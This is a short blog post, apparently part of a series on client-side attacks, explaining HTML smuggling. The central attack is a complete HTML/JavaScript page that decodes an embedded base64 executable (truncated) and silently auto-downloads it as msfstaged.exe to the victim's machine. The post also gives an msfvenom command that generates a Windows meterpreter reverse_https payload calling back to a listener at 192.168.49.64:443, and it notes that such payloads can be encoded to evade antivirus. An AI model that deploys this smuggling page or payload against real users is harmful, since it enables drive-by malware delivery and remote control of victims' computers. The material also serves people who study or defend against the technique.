HTML Smuggling

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.



Whilst in many cases it is easy to spot a suspicious link or suspect file but what if that file downloads automatically? What if it's from a trusted site that has been compromised and informs the user "it's an update"? These are some of the dangers from HTML smuggling


When the victim reads the email and visits the webpage, JavaScript code will use HTML Smuggling to automatically save the dropper file. This technique leverages the HTML5 anchor tag download attribute, which instructs the browser to automatically download a file when a user navgates to a page.

Code Example


The first stage is to start a local Apache server. We'll create a simple page and set the download attribute anchor tag. When a user navigates to this page, the msfstaged.exe file will be automatically downloaded to the user's default download directory.


The first phase is to store an .exe inside JavaScript and allow it to be used with the download attribute. The download attribute only accepts files stored on a web server. However, it will also accept an embedded Blob object. The Blob object may be instantiated from a byte array as shown below.


<html>

<body>

<script>

function base64ToArrayBuffer(base64) {

var binary_string = window.atob(base64);

var len = binary_string.length;

var bytes = new Uint8Array( len );

for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }

return bytes.buffer;

}

var file ='TVqQAAMAAAAEAAAA//8AALgAAAAA/jgAAAAAAAAAAAAAAAAAAA...<SNIP!>'

var data = base64ToArrayBuffer(file);

var blob = new Blob([data], {type: 'octet/stream'});

var fileName = 'msfstaged.exe';

var a = document.createElement('a');

document.body.appendChild(a);

a.style = 'display: none';

var url = window.URL.createObjectURL(blob);

a.href = url;

a.download = fileName;

a.click();

window.URL.revokeObjectURL(url);

</script>

</body>

</html>



The Payload


Payloads (the dropper) can be easily created using freely available tools which can be encoded to evade most antiviruses in this case I have used msfvenom. The command below outlines the payload I want to use, The local IP address of the listener waiting to hear back from the victim and also the local port the hacker's machine will listen on.


msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.64 LPORT=443 -f exe -o /var/www/html/msfstaged.exe


This is then encoded to base 64 and added to the HTML file variable.



Video Example


7 views0 comments

Recent Posts

See All

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. Running Shell Code in C# Over the last few weeks, we have been building payloads an

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. Running Shell Code in C# Using lessons learnt from the last few weeks from both VBA

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. When looking at exploiting operating systems and conducting client-side attacks it